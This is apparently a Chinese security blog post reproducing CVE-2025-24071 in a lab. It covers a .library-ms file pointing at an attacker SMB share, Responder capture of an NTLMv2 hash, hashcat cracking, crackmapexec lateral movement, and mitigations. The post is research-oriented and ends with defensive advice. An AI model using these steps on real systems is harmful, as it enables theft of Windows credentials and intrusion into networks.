CVE-2025-24071 Windows文件资源管理器欺骗漏洞复现

最新推荐文章于 2025-04-28 21:50:54 发布
最新推荐文章于 2025-04-28 21:50:54 发布
阅读量1.9k 收藏 15
点赞数 30
文章标签: windows wireshark 安全威胁分析
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_42773448/article/details/146436061
版权

⚠️ **免责声明**
本文目标读者为安全研究人员与运维人员,任何利用本文内容进行非法攻击的行为均与作者无关。

0. 前言

本文对Microsoft Windows文件资源管理器中存在的欺骗漏洞(CVE-2025-24071)进行详细技术分析,包括漏洞原理、复现过程、流量分析及防护建议。该漏洞允许攻击者通过构造特殊的归档文件,诱导用户在解压时泄露NTLM凭据哈希,CVSS评分7.5,已被发现在野利用。

1. 漏洞概述

CVE-2025-24071是Windows文件资源管理器中的一个欺骗漏洞,利用Windows对.library-ms文件的隐式信任和自动解析特性。攻击者通过构造包含恶意SMB路径的.library-ms文件并打包为ZIP/RAR文件,当用户解压时,Windows资源管理器会自动尝试连接到指定的SMB服务器,从而泄露用户的NTLM认证哈希。

1.1 影响范围

  • Windows 10及更早版本
  • Windows 11(未安装最新补丁的版本)
  • Windows Server 2016/2019/2022(未安装最新补丁的版本)

2. 漏洞原理深度剖析

此漏洞利用了多个Windows组件的交互特性:

2.1 .library-ms文件格式分析

.library-ms是Windows库文件格式,本质上是一个XML文件,用于定义Windows资源管理器中的库视图。其结构包含对网络位置的引用能力:

<?xml version="1.0" encoding="UTF-8"?>
<libraryDescription xmlns="http://schemas.microsoft.com/windows/2009/library">
  <searchConnectorDescriptionList>
    <searchConnectorDescription>
      <simpleLocation>
        <url>\\攻击者IP\共享名</url>
      </simpleLocation>
    </searchConnectorDescription>
  </searchConnectorDescriptionList>
</libraryDescription>

2.2 自动解析机制

Windows文件资源管理器在处理.library-ms文件时存在以下行为:

  1. 预览自动触发:当用户解压包含.library-ms文件的ZIP/RAR归档时,Windows资源管理器会自动预览或解析文件内容
  2. XML内容处理:解析XML时发现网络路径,会尝试连接该路径
  3. 隐式信任:不同于直接访问UNC路径时的安全提示,通过.library-ms文件访问时不会显示警告

2.3 NTLM认证流程

当Windows尝试访问SMB共享时,会自动发起NTLM认证:

  1. 协商阶段(Negotiate): 客户端发送NTLMSSP_NEGOTIATE消息
  2. 质询阶段(Challenge): 服务器返回随机挑战值
  3. 认证阶段(Authenticate): 客户端使用用户哈希加密挑战值进行响应

这一过程会导致用户的NTLMv2哈希被发送到攻击者控制的服务器,而无需用户交互确认。

3. 漏洞复现环境搭建

3.1 实验环境准备

  • 攻击机:Kali Linux (IP: 172.16.137.133)
  • 目标机:Windows 10 (IP: 172.16.137.144)

3.2 攻击工具准备

  1. Responder工具:用于监听和捕获NTLM哈希
sudo responder -I eth0 -wvF
  1. 漏洞利用代码:poc详情见GitHub - 0x6rss/CVE-2025-24071_PoC: CVE-2025-24071: NTLM Hash Leak via RAR/ZIP Extraction and .library-ms File

4. 漏洞利用实践

4.1 创建恶意ZIP文件

  1. 生成.library-ms文件并打包成ZIP:
Enter your file name: exp
Enter IP (EX: 192.168.1.162): 172.16.137.133
completed
  1. 查看生成的XML文件内容:
<?xml version="1.0" encoding="UTF-8"?>
<libraryDescription xmlns="http://schemas.microsoft.com/windows/2009/library">
  <searchConnectorDescriptionList>
    <searchConnectorDescription>
      <simpleLocation>
        <url>\\172.16.137.133\shared</url>
      </simpleLocation>
    </searchConnectorDescription>
  </searchConnectorDescriptionList>
</libraryDescription>

4.2 触发漏洞

  1. exploit.zip传输到目标Windows系统
  2. 在Windows上解压ZIP文件(关键点:解压操作本身即可触发漏洞,无需用户双击打开文件)

4.3 捕获凭据

在Responder输出中可以观察到捕获的NTLMv2哈希:

[SMB] NTLMv2-SSP Client   : 172.16.137.144
[SMB] NTLMv2-SSP Username : DESKTOP-LA8M8KG\sec
[SMB] NTLMv2-SSP Hash     : sec::DESKTOP-LA8M8KG:dd45aa60cd9e198f:9D14C4DD3E7520C3AD241C42A2A09004:010100000000000000583008AC9ADB016BF2D9D5B1638DB40000000002000800360056004C00350001001E00570049004E002D00500048004D005400330050005500320041005100580004003400570049004E002D00500048004D00540033005000550032004100510058002E00360056004C0035002E004C004F00430041004C...

4.4 解密凭据

使用hashcat进行哈希破解:

hashcat -m 5600 hashes.txt wordlist.txt --force

成功破解密码后的输出:

SEC::DESKTOP-LA8M8KG:dd45aa60cd9e198f:9d14c4dd3e7520c3ad241c42a2a09004:010100000000000000583008ac9adb016bf2d9d5b1638db40000000002000800360056004c00350001001e00570049004e002d00500048004d005400330050005500320041005100580004003400570049004e002d00500048004d00540033005000550032004100510058002e00360056004c0035002e004c004f00430041004c0003001400360056004c0035002e004c004f00430041004c0005001400360056004c0035002e004c004f00430041004c000700080000583008ac9adb01060004000200000008003000300000000000000001000000002000007d5ba3970444fe3905fca71c6377579c83e868723605fa89d969b6059108fd5e0a001000000000000000000000000000000000000900260063006900660073002f003100370032002e00310036002e003100330037002e00310033003300000000000000000000000000:123456

5. 网络流量分析

通过对捕获的SMB流量进行分析,我们可以深入了解漏洞触发过程中的网络通信细节。

5.1 TCP连接建立

00:22:35.503181 IP 172.16.137.138.50527 > 172.16.137.133.445: Flags [S]
00:22:35.503241 IP 172.16.137.133.445 > 172.16.137.138.50527: Flags [S.]
00:22:35.503985 IP 172.16.137.138.50527 > 172.16.137.133.445: Flags [.]

5.2 NTLM认证流量

从数据包中提取的NTLM信息显示完整的认证流程:

NTLMSSP identifier: NTLMSSP
NTLM Message Type: NTLMSSP_NEGOTIATE (0x00000001)
NTLMSSP identifier: NTLMSSP
NTLM Message Type: NTLMSSP_CHALLENGE (0x00000002)
NTLMSSP identifier: NTLMSSP  
NTLM Message Type: NTLMSSP_AUTH (0x00000003)
Domain name: DESKTOP-LA8M8KG
User name: sec

5.3 WebDAV请求

Windows尝试通过多种协议访问远程共享:

OPTIONS /shared HTTP/1.1
PROPFIND /shared HTTP/1.1
PROPFIND /shared HTTP/1.1

5.4 NTLMv2哈希传输

成功捕获的NTLMv2响应哈希:

37a066828a708edea553d3d583724016010100000000000080ee4cb39299db01b5923cd0c3af3eac00000000020008003700...

6. 攻击链延伸

获取NTLMv2哈希后,攻击者可以进行以下操作:

6.1 哈希破解

成功使用hashcat破解出密码"123456":

[SMB] NTLMv2-SSP Hash     : sec::DESKTOP-LA8M8KG:dd45aa60cd9e198f:9D14C4DD3E7520C3AD241C42A2A09004:....:123456

6.2 横向移动尝试

使用获取的凭据进行横向移动:

crackmapexec smb 172.16.137.0/24 -u sec -p 123456
SMB 172.16.137.144 445 DESKTOP-LA8M8KG [+] DESKTOP-LA8M8KG\sec:123456

6.3 系统漏洞利用

在我们的复现过程中,还发现目标系统存在更严重的MS17-010(永恒之蓝)漏洞:

smb-vuln-ms17-010: 
|   VULNERABLE:
|   Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
|     State: VULNERABLE

这表明目标系统严重缺乏安全更新,处于极高风险状态。

7. 防御与缓解措施

7.1 系统补丁

  • 安装最新的Windows安全更新,尤其是针对CVE-2025-24071的补丁
  • 确保系统及时更新到受支持的版本

7.2 网络防护

  • 在企业网络边界阻止SMB协议(445端口)的对外连接
  • 实施网络分段和访问控制策略
  • 部署IDS/IPS系统检测和阻止可疑的SMB请求

7.3 系统配置

  • 禁用SMBv1协议: Disable-WindowsOptionalFeature -Online -FeatureName SMB1Protocol
  • 配置Windows防火墙阻止不必要的出站SMB连接
  • 启用SMB签名以防止中间人攻击

7.4 用户安全意识

  • 提高用户对处理来源不明压缩包的警惕性
  • 培训用户识别社会工程学攻击和钓鱼尝试
  • 实施最小权限原则

8. 总结与思考

CVE-2025-24071漏洞展示了Windows文件处理机制中的一个精妙设计缺陷,仅通过用户解压文件这一简单操作就能触发凭据泄露。以下是关键技术要点:

  1. 触发机制的静默性: 无需用户双击或打开文件,仅解压操作即可触发,大大降低了用户警觉性
  2. 文件格式的隐式信任: Windows对.library-ms文件格式的特殊处理,绕过了通常的安全提示
  3. 多协议利用: 攻击利用了SMB、WebDAV等多种协议尝试建立连接
  4. 认证自动化: Windows在访问网络资源时自动发送当前用户凭据,无需用户交互确认

虽然此漏洞本身只能获取NTLM哈希而非完全系统控制权,但在我们的复现过程中,目标系统同时存在MS17-010等严重漏洞,凸显了系统补丁管理的重要性。企业应建立完善的安全更新流程,及时修补已知漏洞,同时实施多层次的防御策略,包括网络隔离、访问控制和用户教育。

此类漏洞提醒我们,即使看似简单的用户操作(如解压文件),也可能引发严重的安全事件。安全不仅仅依赖于单一防御措施,而是需要从技术、流程和人员三个维度构建全面的安全体系。

参考资料

  1. CVE-2025-24071:Microsoft Windows 文件资源管理器欺骗漏洞
  2. Security Update Guide - Microsoft Security Response Center

⚠️本文仅用于教育和安全研究目的。对本文描述的技术的任何滥用行为,作者不承担任何责任。

[系统安全] 二十二.PE数字签名之(下)微软证书漏洞CVE-2020-0601复现Windows验证机制分析
杨秀璋的专栏
02-17 1万+
作者前文介绍了什么是数字签名,利用Asn1View、PEVie、010Editor等工具进行数据提取和分析,这是全网非常新的一篇文章,希望对您有所帮助。这篇文章将详细介绍微软证书漏洞CVE-2020-0601,并讲解ECC算法、Windows验证机制,复现可执行文件签名证书的例子。 这些基础性知识不仅和系统安全相关,同样与我们身边常用的软件、文档、操作系统紧密联系,希望这些知识对您有所帮助,更希望大家提高安全意识,安全保障任重道远。本文参考了参考文献中的文章,并结合自己的经验和实践进行撰写,也推荐大家阅读参
[ vulhub漏洞复现篇 ] zabbix SQL注入漏洞CVE-2016-10134)
qq_51577576的博客
08-14 4710
👨‍🎓 博主介绍:大家好,我是,很高兴认识大家~✨主攻领域:【渗透领域】【数据通信】 【通讯安全】 【web安全】【面试分析】🎉欢迎关注💗一起学习👍一起讨论⭐️一起进步📝文末有彩蛋🙏作者水平有限,欢迎各位大佬指点,相互学习进步!......
CVE-2025-24071-windows文件资源管理器欺骗漏洞复现
meet_you9的博客
03-26 324
windows2025年最新漏洞CVE-2025-24071,可以破解hash密码,含有poc
Win10/Win11 专业版自动更新永久关闭【自用,推荐直接使用第五步即可】
热门推荐
Jester 的博客
03-05 7万+
Win11 自动更新永久关闭【自用,可能有风险】
Tomcat RCE(CVE-2025-24813)复现
Neolock的博客
03-21 1391
它由 Apache 软件基金会下的 Jakarta 项目开发,是目前最流行的 Java Web 服务器之一。这里需要注意Content-Range的分块值需要与Content-Length保持一致,且大于当前文件的长度。我们都知道tomcat是Java语言开发的,所以需要JAVA环境,我这里的Java环境是1.8.0_441。当文件被上传成功后,大概30s之内payload会被自动触发,随之文件会被清除。
漏洞复现CVE-2025-24071Windows文件资源管理器欺骗漏洞
信安百科
04-12 384
漏洞复现CVE-2025-24071Windows文件资源管理器欺骗漏洞
Microsoft Windows 文件资源管理器欺骗漏洞CVE-2025-24071) / NTLM 哈希泄露欺骗漏洞CVE-2025-24054)复现
Neolock的博客
03-22 1417
总的来说,这两个CVE是通过RAR/ZIP提取.library-ms文件,对文件资源管理器欺骗,从而造成进行NTLM哈希泄漏 当包含 SMB 路径的特制.library-ms文件被压缩到 RAR/ZIP 存档中并随后解压时,Windows 资源管理器会根据其内置的索引和预览机制自动解析此文件的内容。出现此行为的原因是,Windows 资源管理器在解压时会自动处理某些文件类型以生成预览、缩略图或索引元数据,即使用户从未明确打开或单击该文件
小白也能看懂的CVE-2025-24071漏洞原理剖析
vortex5的博客
03-30 1827
首先,CVE是什么意思呢?CVE是“通用漏洞披露”(Common Vulnerabilities and Exposures)的缩写,它就像一个全球通用的漏洞“身份证号”,用来标记和追踪计算机系统中的安全问题。CVE-2025-240712025年发现的一个具体漏洞,影响的是Windows操作系统中的文件资源管理器。这个漏洞的危险之处在于,攻击者可以利用它偷走你的NTLM哈希(一种跟密码相关的数字指纹),然后用它来冒充你,进入你的电脑或者网络。
漏洞预警 | Windows 文件资源管理器欺骗漏洞CVE-2025-24071CVE-2025-24054)
C20220511的博客
03-31 1150
当压缩包内存在此类文件时,用户解压包含smb(文件共享服务)路径配置的libray-ms文件,会自动被windows资源管理器内置文件解析机制解析,将受害者的NTLM身份信息发送到攻击者smb服务器。攻击者可以利用该漏洞以管理员权限执行操作,包括但不限于创建新用户、修改现有用户的权限、安装恶意软件等。近日,微软发布windows操作系统更新修复漏洞,其中Windows 文件资源管理器欺骗漏洞CVE-2025-24071CVE-2025-24054)正被广泛利用,建议您及时开展安全风险自查。
图片服务器
whinsist的专栏
07-05 303
1.图片服务器源码 2.图片服务器tomcat配置(tomcat/config/web.xml)         default         org.apache.catalina.servlets.DefaultServlet                     debug             0
Windows文件管理器重大漏洞,无需交互,PoC已发布
FreeBuf_的博客
03-21 1195
Windows文件管理器中发现了一个名为CVE-2025-24071的关键漏洞,攻击者只需解压压缩文件即可窃取用户的NTLM哈希密码,无需用户进行任何交互。
CVE-2021-26855
03-12
攻击者可以构造特制的 HTTP 请求,欺骗服务器执行恶意操作,例如访问内部网络资源,甚至读取或写入服务器上的文件。由于漏洞允许攻击者绕过认证,因此他们无需登录到 Exchange Server 即可发起攻击。 **Go 语言与...
CVE-2023-25157-main(1).zip
07-19
总而言之,CVE-2023-25157是一个涉及GeoServer的SQL注入漏洞,通过复现漏洞,我们可以更好地理解其风险,并采取必要的措施来保护我们的系统。提供的压缩包文件包含的信息将有助于这一过程,对于学习安全防护和提升...
非序列实现MEMS聚焦功能
weixin_72050316的博客
04-25 119
非序列实现MEMS聚焦功能
Callable Future 实现多线程按照顺序上传文件
axia623867666的博客
04-28 325
Callable Future 实现多线程按照顺序上传文件
GPU虚拟化实现(五)
最新发布
wstc2689784536的博客
04-28 852
项目如何去处理显存
JAVA基础:Collections 工具类实战指南-从排序到线程安全
weixin_46619605的博客
04-28 297
JAVA基础:Collections 工具类实战指南-从排序到线程安全
深入了解C# List集合及两种常见排序算法:插入排序与堆排序
net core ,前端 ,python 全栈开发
04-25 727
在C#中,List<T>提供了非常方便的数据存储和操作功能。插入排序和堆排序是两种常见的排序算法,其中插入排序简单易懂,但性能较差,适合小规模数据排序;而堆排序在大数据量排序时效率较高,尤其是在内存限制的情况下。通过掌握这些基本的排序算法,你能够更好地理解算法的运作原理,并在不同场景下选择合适的算法进行优化。
uart怎么转rs422
05-12
UART(通用异步收发传输器)和RS422(差分信号标准)是两种不同的串行通信协议。在将UART转换为RS422时,我们需要借助转换器将UART信号转换为符合RS422标准的差分信号。以下是步骤: 1. 购买UART转RS422转换器。这种转换器通常包含两种连接器类型,一个用于UART端口,另一个用于RS422端口。 2. 将UART接口的信号传递到转换器的UART端口。 3. 根据厂家提供的说明书,连接RS422的传输线,包括A +,A-和B +,B-。在连接之前,请确保参考指南和技术规范以了解正确的引脚布局。 4. 根据配置要求设置串行端口的参数,如波特率、数据位、停止位和奇偶校验等。 5. 完成连接后,测试UART与RS422之间的转换是否成功。通过检查通信的稳定性和传输的正确性进行测试。如果数据能够成功传输,则转换已成功完成。 总之,将UART信号转换为RS422信号需要正确连接转换器的两个接口,并使用适当的配置设置串行端口。经过测试,如果数据能够成功传输,则连接成功。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值